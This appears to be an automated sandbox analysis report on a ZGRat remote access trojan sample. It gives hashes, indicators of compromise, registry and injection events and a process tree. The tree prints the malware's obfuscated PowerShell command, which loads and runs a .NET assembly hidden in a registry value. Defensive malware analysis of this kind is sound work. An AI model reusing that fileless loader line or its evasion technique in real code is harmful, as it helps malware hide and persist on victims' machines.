zgrat | cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

Analysis

max time kernel
150s
max time network
109s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15-05-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

133fda00a490e613f3a6c511c1c660eb.exe
Size

4.5MB
MD5

133fda00a490e613f3a6c511c1c660eb
SHA1

e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256

cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512

f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
SSDEEP

24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score

10^/10

zgrat evasion rat

Malware Config

Signatures

Detect ZGRat V1 34 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2940-2-0x0000000005F40000-0x0000000006180000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-3-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-8-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-4-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-6-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-14-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-20-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-26-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-30-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-38-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-48-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-52-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-50-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-46-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-44-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-42-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-40-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-36-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-34-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-32-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-28-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-24-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-22-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-18-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-16-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-12-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-10-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-54-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-56-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-58-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-66-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-64-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-62-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-60-0x0000000005F40000-0x000000000617A000-memory.dmp	family_zgrat_v1

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1692 created 436 1692 powershell.EXE winlogon.exe
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Drops startup file 1 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs 133fda00a490e613f3a6c511c1c660eb.exe
Executes dropped EXE 2 IoCs

Processes:

$775d00ed$776beb70

pid process

1680 $775d00ed
320 $776beb70
Loads dropped DLL 2 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exe

pid process

2940 133fda00a490e613f3a6c511c1c660eb.exe
2940 133fda00a490e613f3a6c511c1c660eb.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.EXE

description ioc process

File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE

description	pid	process	target process
PID 1692 created 436	1692	powershell.EXE	winlogon.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	133fda00a490e613f3a6c511c1c660eb.exe

pid	process
1680	$775d00ed
320	$776beb70

pid	process
2940	133fda00a490e613f3a6c511c1c660eb.exe
2940	133fda00a490e613f3a6c511c1c660eb.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exepowershell.EXE

description	pid	process	target process
PID 2940 set thread context of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 set thread context of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 1692 set thread context of 2444	1692	powershell.EXE	dllhost.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d013546166a6da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXE133fda00a490e613f3a6c511c1c660eb.exedllhost.exe

pid	process
1692	powershell.EXE
2940	133fda00a490e613f3a6c511c1c660eb.exe
1692	powershell.EXE
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe
2444	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exepowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	2940	133fda00a490e613f3a6c511c1c660eb.exe
Token: SeDebugPrivilege	1692	powershell.EXE
Token: SeDebugPrivilege	2940	133fda00a490e613f3a6c511c1c660eb.exe
Token: SeDebugPrivilege	1692	powershell.EXE
Token: SeDebugPrivilege	2444	dllhost.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exetaskeng.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2940 wrote to memory of 1680	2940	133fda00a490e613f3a6c511c1c660eb.exe	$775d00ed
PID 2816 wrote to memory of 1692	2816	taskeng.exe	powershell.EXE
PID 2816 wrote to memory of 1692	2816	taskeng.exe	powershell.EXE
PID 2816 wrote to memory of 1692	2816	taskeng.exe	powershell.EXE
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 2940 wrote to memory of 320	2940	133fda00a490e613f3a6c511c1c660eb.exe	$776beb70
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 1692 wrote to memory of 2444	1692	powershell.EXE	dllhost.exe
PID 2444 wrote to memory of 436	2444	dllhost.exe	winlogon.exe
PID 2444 wrote to memory of 480	2444	dllhost.exe	services.exe
PID 2444 wrote to memory of 496	2444	dllhost.exe	lsass.exe
PID 2444 wrote to memory of 504	2444	dllhost.exe	lsm.exe
PID 2444 wrote to memory of 604	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 672	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 752	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 820	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 856	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 976	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 276	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 348	2444	dllhost.exe	spoolsv.exe
PID 2444 wrote to memory of 1076	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 1104	2444	dllhost.exe	taskhost.exe
PID 2444 wrote to memory of 1176	2444	dllhost.exe	Dwm.exe
PID 2444 wrote to memory of 1204	2444	dllhost.exe	Explorer.EXE
PID 2444 wrote to memory of 2072	2444	dllhost.exe	svchost.exe
PID 2444 wrote to memory of 1328	2444	dllhost.exe	sppsvc.exe
PID 2444 wrote to memory of 2816	2444	dllhost.exe	taskeng.exe
PID 2444 wrote to memory of 1692	2444	dllhost.exe	powershell.EXE
PID 2444 wrote to memory of 2080	2444	dllhost.exe	conhost.exe
PID 2444 wrote to memory of 320	2444	dllhost.exe	$776beb70

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:436

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{42fdab5d-5af4-442f-b44d-5d15faf0d241}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
- Modifies security service
PID:752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:820

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
3⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
PID:856

C:\Windows\system32\taskeng.exe
taskeng.exe {00E7FC05-B848-462F-990D-687FCC9AC81A} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'RE').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:276

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1076

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:2072

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1328

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:496

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:504

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe
"C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940

C:\Users\Admin\AppData\Local\Temp\$775d00ed
"C:\Users\Admin\AppData\Local\Temp\$775d00ed"
3⤵
- Executes dropped EXE
PID:1680

C:\Users\Admin\AppData\Local\Temp\$776beb70
"C:\Users\Admin\AppData\Local\Temp\$776beb70"
3⤵
- Executes dropped EXE
PID:320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-106274011121221992836097402759122997-1382717557-11145955461325743251-1558568642"
1⤵
PID:2080

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\$775d00ed
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
memory/1680-4910-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1692-4916-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4942-0x0000000001390000-0x00000000013BA000-memory.dmp

Filesize
168KB

Download
memory/1692-4941-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4917-0x00000000009F0000-0x00000000009F8000-memory.dmp

Filesize
32KB

Download
memory/1692-5108-0x000007FEF5D6E000-0x000007FEF5D6F000-memory.dmp

Filesize
4KB

Download
memory/1692-4915-0x000000001A090000-0x000000001A372000-memory.dmp

Filesize
2.9MB

Download
memory/1692-4914-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4913-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4912-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4911-0x000007FEF5D6E000-0x000007FEF5D6F000-memory.dmp

Filesize
4KB

Download
memory/1692-5109-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/2940-10-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-4884-0x00000000022D0000-0x000000000231C000-memory.dmp

Filesize
304KB

Download
memory/2940-46-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-44-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-42-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-40-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-36-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-34-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-32-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-28-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-24-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-22-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-18-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-16-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-12-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-0-0x000000007462E000-0x000000007462F000-memory.dmp

Filesize
4KB

Download
memory/2940-54-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-56-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-58-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-66-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-64-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-62-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-60-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-50-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-4883-0x0000000004DB0000-0x0000000004E2E000-memory.dmp

Filesize
504KB

Download
memory/2940-4885-0x0000000074620000-0x0000000074D0E000-memory.dmp

Filesize
6.9MB

Download
memory/2940-4886-0x0000000074620000-0x0000000074D0E000-memory.dmp

Filesize
6.9MB

Download
memory/2940-4887-0x000000007462E000-0x000000007462F000-memory.dmp

Filesize
4KB

Download
memory/2940-4888-0x0000000074620000-0x0000000074D0E000-memory.dmp

Filesize
6.9MB

Download
memory/2940-4889-0x0000000074620000-0x0000000074D0E000-memory.dmp

Filesize
6.9MB

Download
memory/2940-52-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-48-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-38-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-30-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-26-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-20-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-14-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-6-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-4-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-4918-0x00000000045F0000-0x0000000004644000-memory.dmp

Filesize
336KB

Download
memory/2940-4940-0x0000000074620000-0x0000000074D0E000-memory.dmp

Filesize
6.9MB

Download
memory/2940-8-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-3-0x0000000005F40000-0x000000000617A000-memory.dmp

Filesize
2.2MB

Download
memory/2940-2-0x0000000005F40000-0x0000000006180000-memory.dmp

Filesize
2.2MB

Download
memory/2940-1-0x0000000000880000-0x0000000000D06000-memory.dmp

Filesize
4.5MB

Download